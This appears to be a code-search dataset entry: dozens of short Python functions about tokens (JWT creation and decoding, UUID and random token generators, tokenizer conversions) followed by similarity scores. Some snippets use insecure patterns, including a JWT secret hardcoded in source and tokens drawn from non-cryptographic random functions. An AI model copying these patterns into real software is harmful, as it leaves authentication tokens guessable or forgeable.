self.unk_token_id", "def odb_token():\n return genToken()", "def token(self) -> str:\n return pulumi.get(self, \"token\")", "def token(self) -> str:\n return pulumi.get(self, \"token\")", "def token(self) -> str:\n return pulumi.get(self, \"token\")", "def generateToken():\n length = random.randint(8, 32)\n rdmtoken = ''.join(random.choice(string.printable) for i in range(length))\n return 
f'{rdmtoken}'", "def decode_token(token):\n text = xlmr.decode(torch.tensor(token).long())\n return text.replace(' ', '')", "def generate_token(self):\n token = randint(100000000000000000, 999999999999999999)\n return str(token)", "def token(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"token\")", "def convert_to_string(tokens):\n\n return ' '.join(tokens)", "def __str__(self):\n return str(self.__token)", "def token(self) -> str:\n raise NotImplementedError", "def encode_auth_token(self, id):\n payload = {\n \"exp\": datetime.utcnow()\n + timedelta(\n days=current_app.config.get(\"TOKEN_EXPIRATION_DAYS\"),\n seconds=current_app.config.get(\"TOKEN_EXPIRATION_SECONDS\"),\n ),\n \"iat\": datetime.utcnow(),\n \"sub\": id,\n }\n return jwt.encode(\n payload, current_app.config.get(\"SECRET_KEY\"), algorithm=\"HS256\"\n )", "def generate_token():\n return uuid4()", "def new_token(*args, **kwargs):\n return uuid.uuid4().hex", "def token_str(self) -> Optional[str]:\n return self._token_str", "def _id(self):\n result = ''\n while self.current_char is not None and self.current_char.isalnum() or self.current_char == '_':\n result += self.current_char\n self.advance()\n\n return Token(ID, result)", "def get_client_token(**_):\n return str(uuid.uuid4())", "def get_token(self, tid):\n if self.lliagraph:\n return self.lliagraph.get_token(tid)\n else:\n return None", "def string2Token(self,phrase):\n return self._support.string2Token(phrase)", "def identifier(self) -> str:\n return self.current_token", "def create_token(self,uid):\n token_str = self.get_random(5) + str(uid) + str(int(time.time()))\n m = hashlib.md5()\n m.update(token_str)\n return m.hexdigest()", "def process_id_from(self):\r\n return self._tokens[1]", "def generate_token(self, user_id):\n try:\n # set up a payload with an expiration time\n payload = {\n 'exp': datetime.utcnow() + timedelta(minutes=10),\n 'iat': datetime.utcnow(),\n 'sub': user_id\n }\n # create the byte string encoded token using payload and SECRET key\n jwt_string = jwt.encode(\n payload,\n SECRET_KEY,\n algorithm='HS256'\n )\n return jwt_string\n except Exception as e:\n # return an error in string format if an exception occurs\n return str(e)", "def __str__(self):\n return self.token", "def token(uncapped_token):\n return uncapped_token", "def token(self):\n \n payload = {\n 'sub_type': self.sub_type,\n '_hash' : self._hash,\n 'jti' : str(uuid.uuid4())\n }\n return jwt.encode(payload, self.secret, self.algo).decode('utf-8')", "def get(uid: int, token_id: int):\n\n token = Token.get(uid, token_id).as_dto().to_primitive()\n\n if token:\n return token.to_primitive()\n else:\n raise NotFound(\"Token Not Found\")", "def token(uncapped_token: Contract):\n return uncapped_token", "def string_val(self) -> str:\n return self.current_token", "def decode_tokens_to_str(self, tokens: List[int]) -> str:\n hypothesis = self.tokenizer.ids_to_text(tokens)\n return hypothesis", "def get_token(id=None, name=None):\n\tif id is None and name is None:\n\t\tname = config['username']\n\treturn get_user(id=id, name=name, get_missing=False).token", "def identifier(self):\n _id = ''\n while self.current_char is not None and self.current_char.isalpha():\n # inner loop to get alphanumeric characters\n while self.current_char is not None and\\\n self.current_char.isalnum():\n _id += self.current_char\n self.advance()\n return Token(self.tokentype['ID'], _id)", "def getUniStr(self):\n return(\"%s/%s\"%(self.token.id,self.type))", "def get_token(self):\n return self.__token", "def 
get_token(self):\n return self.__token", "def _identifier(self):\n identifier = self._get_next_symbol()\n\n while True:\n symbol = self._get_next_symbol()\n if symbol != None and symbol.isalnum():\n identifier += symbol\n else:\n if symbol != None:\n self._back()\n break\n\n return self._create_identifier_token(identifier)", "def id(self, tokens):\n if len(tokens) != 1:\n raise Exception(\"Unexpected argument counts\")\n return tokens[0].value", "def decode_token(token):\n payload = None\n try:\n payload = jwt.decode(token.encode('utf-8'), '1$Arh\"1bWa/7+OS', algorithm='HS256')['u_id']\n except jwt.InvalidTokenError:\n pass\n return payload", "def token(self):\n return self[\"token\"]", "def token2id(data, mode):\n vocab_path = 'vocab.' + mode\n in_path = data + '.' + mode\n out_path = data + '_ids.' + mode\n _, vocab = load_vocab(os.path.join(config.PROCESSED_PATH, vocab_path))\n in_file = open(os.path.join(config.PROCESSED_PATH, in_path), 'rb')\n out_file = open(os.path.join(config.PROCESSED_PATH, out_path), 'wb')\n\n lines = in_file.read().splitlines()\n for line in lines:\n if mode == 'dec': # we only care about '<s>' and </s> in encoder\n ids = [vocab[b'<s>']]\n else:\n ids = []\n ids.extend(sentence2id(vocab, line))\n # ids.extend([vocab.get(token, vocab['<unk>']) for token in basic_tokenizer(line)])\n if mode == 'dec':\n ids.append(vocab[b'</s>'])\n out_file.write(b' '.join(str(id_).encode('ascii') for id_ in ids) + b'\\n')", "def generate_token(payload: Any, secret: str | List[str]) -> str:\n return url_encode_full_stops(URLSafeTimedSerializer(secret).dumps(payload, \"token\"))", "def encode_token(userId):\n token = jwt.encode({'userId': userId, 'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=20)},\n secret_key).decode('utf-8')\n return token", "def token_id(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"token_id\")", "def generate_client_token_by_uuid():\n return str(uuid.uuid4())", "def generate_client_token_by_uuid():\n return str(uuid.uuid4())", "def token(self, ent):\n if ent.eid in self.lookup: return self.lookup[ent.eid]\n\n if ent.tid == data.AGENT_TYPE_ID: prefix = 'A'\n elif ent.tid in data.combatants: prefix = 'C'\n elif ent.tid in data.gatherable: prefix = 'G'\n\n ct = self.counts[prefix]\n self.counts[prefix] += 1\n tok = \"{}{}\".format(prefix, ct)\n self.lookup[ent.eid] = tok\n return tok", "def token(self):\n if not hasattr(self,'_tokens'):\n ts = str(time.time())\n rs = str(random.randint(1234,65535))\n self._tokens = '%s_%s_%s' % (self.key().name(),ts,rs)\n return self._tokens", "def _generate_token_value():\n return secrets.token_urlsafe()", "def token(self, ent):\n if ent.eid in self.lookup: return self.lookup[ent.eid]\n\n if ent.tid == data.AGENT_TYPE_ID: prefix = 'A'\n elif ent.tid in data.combatants: prefix = 'C'\n elif ent.tid in data.gatherable: prefix = 'G'\n\n self.lookup[ent.eid] = prefix\n return prefix", "def get_token(self, bot_id):\n res = self.execute(TABELLE['bot']['select']['by_id'], (bot_id,))\n # print(res)\n return res", "def token_to_word(self, token):\n\n word = \" \" if token == 0 else self.index_to_word[token]\n return word", "def parse_token(bn,token):\n return bn.split(token)[1].split('_')[0]", "def convertTokensToSourceString(self, tokens):\n sense = self.sense\n return \" \".join([sense.tokens[t-1][1]\n if t > 0 else \"[%s]\" % sense.tokens[sense.mapNodeToMainToken[-t]-1][0]\n for t in tokens])", "def toString(self):\n return self.tokens.toString()", "def token(self):\r\n return self._token", "def 
token(self):\n payload = {\n 'id': str(self.id),\n 'username': self.username,\n \"exp\": datetime.now() + timedelta(days=2)\n }\n return jwt.encode(payload, SECRET_KEY).decode('utf-8')", "def token_id_to(self, token_id_to):\n\n self._token_id_to = token_id_to", "def get_token(self):\n\n return self._token", "def generate(self):\n return self.rpc.call(MsfRpcMethod.AuthTokenGenerate)['token']", "def token(db):\n token = TokenFactory()\n db.session.commit()\n return token", "def token(self):\n return self._token", "def token(self):\n return self._token", "def token(self):\n return self._token", "def _token_to_id(self, sequence_tokens, token_map, char_map, ngram=0,\n token_ngram_map=None, max_char_sequence_length=-1,\n max_char_length_per_token=-1):\n token_id_list = []\n char_id_list = []\n char_in_token_id_list = []\n ngram_id_list = []\n for token in sequence_tokens:\n char_id = [char_map.get(x, self.VOCAB_UNKNOWN) for x in token]\n char_id_list.extend(char_id[0:max_char_sequence_length])\n char_in_token = [char_map.get(x, self.VOCAB_UNKNOWN)\n for x in token[0:max_char_length_per_token]]\n char_in_token_id_list.append(char_in_token)\n\n token_id_list.append(\n token_map.get(token, token_map[self.VOCAB_UNKNOWN]))\n if ngram > 1:\n for j in range(2, ngram + 1):\n ngram_id_list.extend(\n token_ngram_map[x] for x in\n [\"\".join(sequence_tokens[k:k + j]) for k in\n range(len(sequence_tokens) - j + 1)] if x in\n token_ngram_map)\n if not sequence_tokens:\n token_id_list.append(self.VOCAB_PADDING)\n char_id_list.append(self.VOCAB_PADDING)\n char_in_token_id_list.append([self.VOCAB_PADDING])\n if not ngram_id_list:\n ngram_id_list.append(token_ngram_map[self.VOCAB_PADDING])\n return token_id_list, char_id_list, char_in_token_id_list, ngram_id_list", "def get_token(self):\n token = self._session.token\n return token", "def get_word(self, word_id):\n if word_id in self.id_to_word:\n return self.id_to_word[word_id]\n return constants.UNK_TOKEN", "def generate_new_token(uid):\n random_token = uuid.uuid4()\n token = TokenAuth(user_id=uid, token=random_token)\n token.save()\n return random_token", "def tokenize(*args, **kwargs):\n if kwargs.pop('pure', False):\n return base.tokenize(*args)\n else:\n return str(uuid.uuid4())", "def decode_token(token):\n try:\n # Decode token with our secret key\n payload = jwt.decode(token, SECRET_KEY)\n return payload['sub']\n except jwt.ExpiredSignatureError:\n # token has expired\n return \"Timed out. Please login to get a new token\"\n except jwt.InvalidTokenError:\n return \"Invalid token. Please register or login\"", "def token(self) -> Optional[str]:\n return self._builder._token", "def convert_tokens_to_string(self, tokens):\r\n text = ''.join(tokens)\r\n text = bytearray([self.byte_decoder[c] for c in text]).decode('utf-8', errors=self.errors)\r\n return text", "def decode_token(token):\n try:\n # try to decode the token using our SECRET variable\n payload = jwt.decode(token, app.config.get('SECRET_KEY'), algorithms=['HS256'])\n return payload['sub']\n except jwt.ExpiredSignatureError:\n # the token is expired, return an error string\n return \"Expired token. Please login to get a new token\"\n except jwt.InvalidTokenError:\n # the token is invalid, return an error string\n return \"Invalid token. Please register or login\"" ]
[ "0.7235237", "0.69436103", "0.6893987", "0.6749872", "0.67123127", "0.6693682", "0.6675571", "0.6672998", "0.6606152", "0.66021", "0.65837336", "0.6532288", "0.6484542", "0.64636326", "0.6327243", "0.62979484", "0.6255819", "0.6240919", "0.6239636", "0.6181812", "0.6127101", "0.61171526", "0.60637593", "0.6061362", "0.6053765", "0.60517514", "0.6048818", "0.6044519", "0.6042805", "0.6042805", "0.6042805", "0.60329777", "0.5997915", "0.59543717", "0.59190714", "0.5912813", "0.58965236", "0.5892763", "0.5883206", "0.5861231", "0.58474785", "0.5845007", "0.5838376", "0.58327585", "0.5821224", "0.5816067", "0.5812652", "0.58045083", "0.57851505", "0.5771515", "0.57606", "0.57363135", "0.57292736", "0.57220364", "0.57161117", "0.57045275", "0.56796557", "0.5668658", "0.5656479", "0.56491184", "0.5647739", "0.5647739", "0.5642004", "0.562873", "0.5625179", "0.5623233", "0.5620486", "0.5614562", "0.56116515", "0.56103754", "0.55896914", "0.55896914", "0.55888283", "0.55881333", "0.5576327", "0.5576221", "0.55753624", "0.554752", "0.55412453", "0.55298054", "0.552699", "0.55260754", "0.55240077", "0.55210984", "0.55091023", "0.5505463", "0.54969895", "0.54915464", "0.54915464", "0.54915464", "0.5480269", "0.54339933", "0.54221207", "0.5411542", "0.54101264", "0.5406955", "0.5399852", "0.53924626", "0.5385505" ]
0.7267592
1
Return the vocabulary as a reversed dict object.
def reverse_vocab(self): return self._id2token
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def reverse_vocab(vocab: Dict[str, int]) -> Dict[int, str]:\n return {v: k for k, v in vocab.items()}", "def reverse_dicts(self):\n\t\tself.rev_worddict = {self.worddict[word]: word for word in self.worddict}\n\t\tself.rev_classdict = {self.classdict[cl]: cl for cl in self.classdict}", "def __reversed__(self):\n\t\treturn reversed(self.__dict__.values())", "def reverse(dictionary):\n return {b: a for a, b in dictionary.items()}", "def generate_vocab_dict(vocab):\n v_dict = {}\n for word in vocab:\n if len(word) in v_dict:\n v_dict[len(word)].append(word)\n else:\n v_dict[len(word)] = [word]\n return v_dict", "def _rev_dict(d):\n return {v: k for k, v in d.items()}", "def reverse_word_index(word_index):\n return dict([(word_index[word], word) for word in word_index])", "def vocabulary(self):\n return self._vocabulary", "def as_dict(self):\r\n return {self.words[i]: self.vectors[i] for i in range(self.n)}", "def build_reverse_dictionary(word_to_id):\n reverse_dictionary = dict(zip(word_to_id.values(), word_to_id.keys()))\n return reverse_dictionary", "def vocabulary(self):\n return [recid for recid in self._model.vocab]", "def _get_term_dictionaries(self):\n\t\tforward_dict = {}\n\t\treverse_dict = defaultdict(list)\n\t\tfor term in self.terms():\n\t\t\tif (term.name is not None) and (\"obsolete\" not in term.name): \n\t\t\t\twords = [term.name]\n\t\t\t\twords.extend([x.description for x in list(term.synonyms)])\t# Add all the synonyms\n\t\t\t\twords = [re.sub(r\" ?\\([^)]+\\)\", \"\", x) for x in words]\t\t# Replace parenthetical text.\n\t\t\t\tforward_dict[term.id] = words\n\t\t\t\tfor word in words:\n\t\t\t\t\treverse_dict[word].append(term.id)\n\t\treturn(forward_dict, reverse_dict)", "def get_ordered_vocabulary(self):\n idx_rev = dict((y, x) for x, y in self.ngram_to_idx.items())\n ordered_vocab = list(map(lambda i: idx_rev[i], range(len(self.vocab))))\n return ordered_vocab", "def vocabulary(self):\n lst = []\n for key in self.frequencies().keys():\n lst.append(key)\n return sorted(lst)\n #for lines in self.lines:\n # line = lines.strip(os.linesep)\n # wordslst = line.split()\n # for word in wordslst:\n # if word not in lst:\n # lst.append(word.lower())\n #return sorted(lst)", "def load_reverse_dict(dict_path):\n result_dict = {}\n # TODO 字和词模型\n for idx, line in enumerate(io.open(dict_path, \"r\", encoding='utf8')):\n terms = line.strip(\"\\n\")\n result_dict[terms] = idx\n return result_dict", "def invert(self):\n return _({self[k]: k for k in self._})", "def build_vocab(sentences, saved_vocabulary_inv):\n if saved_vocabulary_inv:\n vocabulary_inv = saved_vocabulary_inv\n else:\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def generate_vocabulary():\n stop_words = load_stop_words()\n words = ' '.join(generate_corpus()).split()\n print(len(words))\n vocabulary = {}\n for word in words:\n if word in stop_words:\n continue\n if word in vocabulary.keys():\n vocabulary[word] += 1\n else:\n vocabulary[word] = 1\n vocabulary = dict(sorted(vocabulary.items(), key=lambda x: x[1], reverse=True))\n return vocabulary", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in 
rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def get_dict(self):\n return {key: value for key, value in zip(self._words, self._vecs)}", "def getVocabulary(self): # real signature unknown; restored from __doc__\n pass", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"r\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [tf.compat.as_bytes(line.strip()) for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"r\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def get_vocab(self):\n word2id = {}\n for document in self.docs:\n for word in document:\n if word not in word2id.keys():\n word2id[word] = len(word2id)\n return word2id", "def initialize_vocabulary(vocabulary_path):\n if os.path.exists(vocabulary_path):\n rev_vocab = []\n with codecs_open(vocabulary_path, \"rb\", encoding=\"utf-8\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def getVocabularyDict(vocabulary: dict, training_feature: TrainingFeature):\n vocab = {}\n index = 0\n if training_feature.FEATURE_DROP_FREQUENT_WORDS:\n print(\"Select vocabdict with drop_frequent\")\n array = sorted([(k, v) for (k, v) in vocabulary.items()], key= lambda x: x[1])\n print(\"Total length: \", len(array))\n length = len(array)\n array = array[int(length * 0.75): int(length * 1.0)][0:training_feature.VOCAB_SIZE]\n for (k , _) in array:\n vocab.setdefault(k, index)\n index += 1\n else:\n print(\"Select vocabdict with non_drop_frequent\")\n 
array = sorted([(k, v) for (k, v) in vocabulary.items()], key=lambda x: x[1])\n length = len(array)\n print(\"Total length: \", length)\n array = array[-training_feature.VOCAB_SIZE:]\n for (k, _) in array:\n vocab.setdefault(k, index)\n index += 1\n # for (k, v) in vocabulary.items():\n # if v > 50:\n # vocab.setdefault(k, index)\n # index += 1\n print(\"VocabDict length: \", len(vocab))\n # print(vocab)\n return vocab", "def reverse_iteritems(self):\n return self._reverse_store.iteritems()", "def invertDictionary(input_dict):\n inverse_dict = {v: k for k, v in input_dict.items()}\n\n return inverse_dict", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences)) # 实际没用到\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n vocabulary_inv = list(sorted(vocabulary_inv))\n # 加入 <UNK>\n vocabulary_inv.insert(0, '</s>')\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def reverse_values(self):\n return self._reverse_store.values()", "def get_output_vocab():\n vocab = set(list(string.digits) + [':'])\n\n inv = dict(enumerate(sorted(vocab)))\n output = {v:k for k,v in inv.items()}\n return output, inv", "def getVocabulary(vocabulary_id):\n relex_web = getSite().restrictedTraverse('relex_web')\n key = KEY_STORAGE + \".\" + vocabulary_id\n vocabulary = json.loads(getattr(relex_web, key, \"[]\"))\n return vocabulary", "def get_vocab(self):\n\n\t\tself.parse_transcript() \n\t\tself.purge_words()\n\t\tself.analyze_words()\n\t\tself.sort_word_analysis()", "def get_vocab(self):\n if os.path.exists(self.vocab_file) & self.vocab_from_file:\n f = open(self.vocab_file, \"rb\")\n vocab = pickle.load(f)\n self.word2idx = vocab.word2idx\n self.idx2word = vocab.idx2word\n f.close()\n else:\n self.build_vocab()\n with open(self.vocab_file, 'wb') as f:\n pickle.dump(self, f)", "def _get_vocabulary(connection):\n print('---Getting vocabulary---')\n vocabulary = {}\n cursor = connection.cursor()\n cursor.execute(\"SELECT * FROM words;\")\n res = cursor.fetchall()\n num_words = 0\n for word in res:\n vocabulary[word[0]] = num_words\n num_words += 1\n return vocabulary", "def revert_dictionary(dictionary):\n return {v: k for k, v in dictionary.items()}", "def _load_vocabulary(self) -> Dict[str, int]:\n\n df_existing_vocab = self._db_connection.get_dataframe(table_name='tfidf_vocabulary', schema='encoded_articles')\n\n df_existing_vocab.set_index('word', inplace=True)\n\n return df_existing_vocab['feature_matrix_index'].to_dict()", "def decode(self, seq):\n return [ self.rev_vocab[int(el)] for el in seq ]", "def load_vocab(vocab_file):\n index = 0\n itos = {}\n stoi = {}\n with open(vocab_file, \"r\") as reader:\n while True:\n token = reader.readline()\n if not token:\n break\n token = token.strip()\n itos[index] = token\n stoi[token] = index\n index += 1\n itos[index] = 'style_options'\n stoi['style_options'] = index\n itos[index+1] = 'ambience'\n stoi['ambience'] = index + 1\n return {'itos': itos, 'stoi': stoi, 'len': len(itos)}", "def _create_deleted_variation_2_dictionary_words(self):\n deleted_variation_2_dictionary_words = defaultdict(set)\n for word in self._word_2_frequency.keys():\n deleted_variations = chain(self._one_edit_deleted_variations(word), self._two_edits_deleted_variations(word))\n for deleted_variation in deleted_variations:\n deleted_variation_2_dictionary_words[deleted_variation].add(word)\n return 
deleted_variation_2_dictionary_words", "def load_vocab(self):\n keys = []\n values = []\n with open(self.embed_file, 'r') as f:\n lines = f.readlines()\n\n for line in lines:\n key = line.split(\" \")[0]\n value = line.split(\" \")[1:]\n keys.append(key)\n values.append(value)\n # form <dict>\n # vocab = dict(zip(keys, values))\n return keys, values", "def load(cls, w2v_vocab):\n n2v_vocab = cls()\n for key, value in w2v_vocab.__dict__.items():\n setattr(n2v_vocab, key, value)\n return n2v_vocab", "def get_encoding_dict(self) -> Dict[str, int]:\n return {k.lower():v for v,k in enumerate(self.vocabulary_list)}", "def vocab(self) -> Vocabulary:\n return self._model.vocab", "def reverse_itervalues(self):\n return self._reverse_store.itervalues()", "def vocabulary(self, config=Config()):\n raise NotImplementedError(\"Class %s doesn't implement vocabulary()\" % self.__class__.__name__)", "def InvertDict(dict_in):\n return dict(zip(dict_in.values(), dict_in.keys()))", "def create(self, vocabulary=list) -> dict:\n try:\n out = {}\n for i in range(len(vocabulary)):\n out[vocabulary[i]] = i\n return(out)\n except Exception as error:\n print(f\"Error: self.create([...]) -> {error}\")", "def build_vocab(words, vocab_size, visual_fld=None):\n utils.safe_mkdir(visual_fld)\n file = open(os.path.join(visual_fld, 'vocab.tsv'), 'w',encoding='utf8')\n\n dictionary = dict()\n count = [('UNK', -1)]\n index = 0\n count.extend(Counter(words).most_common(vocab_size - 1))\n\n for word, _ in count:\n dictionary[word] = index\n index += 1\n file.write(word + '\\n')\n\n index_dictionary = dict(zip(dictionary.values(), dictionary.keys()))\n file.close()\n return dictionary, index_dictionary", "def loadVoc(vocabFName):\n f = open(vocabFName, 'r')\n lines = f.readlines()\n f.close()\n result = dict()\n for idx, val in enumerate(lines):\n word = val.strip('\\n')\n result[word] = idx\n return result", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n vocabulary_inv = list(sorted(vocabulary_inv))\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def text2vec(self, maxlen):\n # Vocab = {word : index}\n self.Vocab = dict()\n\n for SentenceLabel in self.Pos + self.Neg:\n vector = [0] * maxlen\n for index, word in enumerate(SentenceLabel[0]):\n if index >= maxlen:\n break\n if word not in self.Vocab.keys():\n self.Vocab[word] = len(self.Vocab)\n vector[index] = len(self.Vocab) - 1\n else:\n vector[index] = self.Vocab[word]\n SentenceLabel[0] = vector\n self.doConvert = True", "def construct_dict(self):\n i = 0\n self.word2idx = dict()\n fi = open(self.config.word_vec_fi_glove, 'r')\n\n for line in fi:\n self.word2idx[line.split(\" \")[0]] = i\n i += 1\n\n self.vocab_size = i\n self.write_dict()\n fi.close()", "def load_vocab(fn):\n return corpora.Dictionary.load(fn)", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n # Mapping from word 
to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def load_vocabulary():\n global vocabulary_list, vocabulary_dict\n vocabulary_list = []\n vocabulary_dict = {}\n\n with open(_VOCABULARY_PATH, 'r') as f:\n for index, line in enumerate(f):\n line = line.strip()\n vocabulary_dict[line] = index\n vocabulary_list.append(line)", "def read_vocabulary(vocabulary_id):\n query = (\n select([vocabulary_table])\n .where(vocabulary_table.c.id == vocabulary_id))\n res = query.execute().first()\n if res is not None:\n return dict(res)", "def _create_dictionary(self, document):\n words = self._normalize_words(document.words)\n unique_words = frozenset(words)\n return dict((word, idx) for idx, word in enumerate(unique_words))", "def create_ngram_dict(min_ngram=1, max_ngram=3, filename='./resources/vocabulary.json'):\n db_labels = get_labels_from_db()\n vocabulary = filter_ngram_labels(db_labels, min_ngram, max_ngram)\n save_dict_as_json(vocabulary, filename)\n return vocabulary", "def vocab(self):\n num_words = -1\n if not self._vocab:\n c = self._conn.cursor()\n c.execute('select feature, censored, word_id from vocab')\n\n d = {}\n for ww, cc, ii in c:\n d[ii] = ww\n d[ww] = ii\n if cc == 1:\n self._censored.add(ww)\n num_words = max(ii, num_words)\n\n logger.info(\"Loaded vocab with %i words; %i censored\" % \\\n (len(d) / 2, len(self._censored)))\n\n # Add the start symbol\n if not START_SYMBOL in d:\n d[START_SYMBOL] = num_words + 1\n d[num_words + 1] = START_SYMBOL\n\n logger.info(\"Retrieved %i words\" % num_words)\n self._vocab = d\n\n return self._vocab", "def vocab():\n symbols = DEFAULT_SPECIAL_SYMBOLS + [\"mouse\", \"dog\", \"tree\"]\n return Vocabulary(symbols)", "def reverse_enum(\n enum_to_reverse: Union[\n Type[SMOOTHIE_G_CODE],\n Type[MAGDECK_G_CODE],\n Type[TEMPDECK_G_CODE],\n Type[THERMOCYCLER_G_CODE],\n Type[HEATER_SHAKER_G_CODE],\n ]\n) -> Dict:\n # I don't know what is going on with mypy, it is complaining\n # about keys not existing as an attribute. I am not calling it\n # as an attribute. I am calling it as a function.\n members = enum_to_reverse.__members__.keys()\n values = [enum_to_reverse[member] for member in members]\n return dict(zip(values, members))", "def reversed_face(self):\n return Face(self.topods_shape().Reversed())", "def to_json(self) -> str:\n vocab_dict = dict()\n # Perform sanity check to make sure that we are able to reconstruct the original vocab\n for i, tok in enumerate(self._all_tokens):\n if self._token_to_idx[tok] != i:\n warnings.warn('The vocabulary is corrupted! One possible reason is that the '\n 'tokens are changed manually without updating the '\n '_token_to_idx map. 
Please check your code or report an issue in '\n 'Github!')\n vocab_dict['all_tokens'] = self._all_tokens\n vocab_dict['special_token_key_value'] = self._special_token_kv\n ret = json.dumps(vocab_dict, ensure_ascii=False)\n return ret", "def reverse_items(self):\n return self._reverse_store.items()", "def build_vocab(sentences_list, vocab_size, visual_fld):\n words = [word for sentence in sentences_list for word in sentence]\n utils.safe_mkdir(visual_fld)\n with open(os.path.join(visual_fld, 'vocab.tsv'), 'w') as fd:\n dictionary = {}\n index_dictionary = {}\n count = [('UNK', -1)]\n count.extend(Counter(words).most_common(vocab_size - 1))\n for index, (word, _) in enumerate(count):\n dictionary[word] = index\n index_dictionary[index] = word\n fd.write(word + '\\n')\n\n return dictionary, index_dictionary", "def get_input_vocab():\n vocab = set()\n vocab.update(list(string.ascii_letters))\n vocab.update(list(string.digits))\n vocab.update(list(string.punctuation))\n vocab.update(list(string.whitespace))\n vocab.update(['<unk>', '<pad>'])\n return dict(zip(sorted(vocab), list(range(len(vocab)))))", "def rev_dict(input_dict):\n return_dict = {}\n for i, j in input_dict.items():\n return_dict[abs(j)] = i\n return return_dict", "def convertToDict(self): \n out = dict() \n out[\"Title\"] = self.title \n editions = []\n for edition in self.editions.values(): \n editions.append(edition.convertToDict(withTitle = False))\n out[\"Editions\"] = editions\n return out", "def test_dict_ancestor_and_reversed():\n from collections import OrderedDict\n\n class Child(dict):\n def __reversed__(self):\n return reversed(range(10))\n\n seq = reversed(OrderedDict())\n return reversed(Child()), seq", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common() if x[1] > 1]\n vocabulary_inv += ['$']\n vocabulary_inv = list(sorted(vocabulary_inv))\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def load_vocab():\n # vocab loaded internally at google\n unused = r.sp_model\n del unused\n return r", "def load_vocab(vocab_file):\n vocab = collections.OrderedDict()\n index = 0\n with open(vocab_file, \"r\", encoding=\"utf-8\") as reader:\n while True:\n token = reader.readline()\n if not token:\n break\n token = token.strip()\n vocab[token] = index\n index += 1\n return 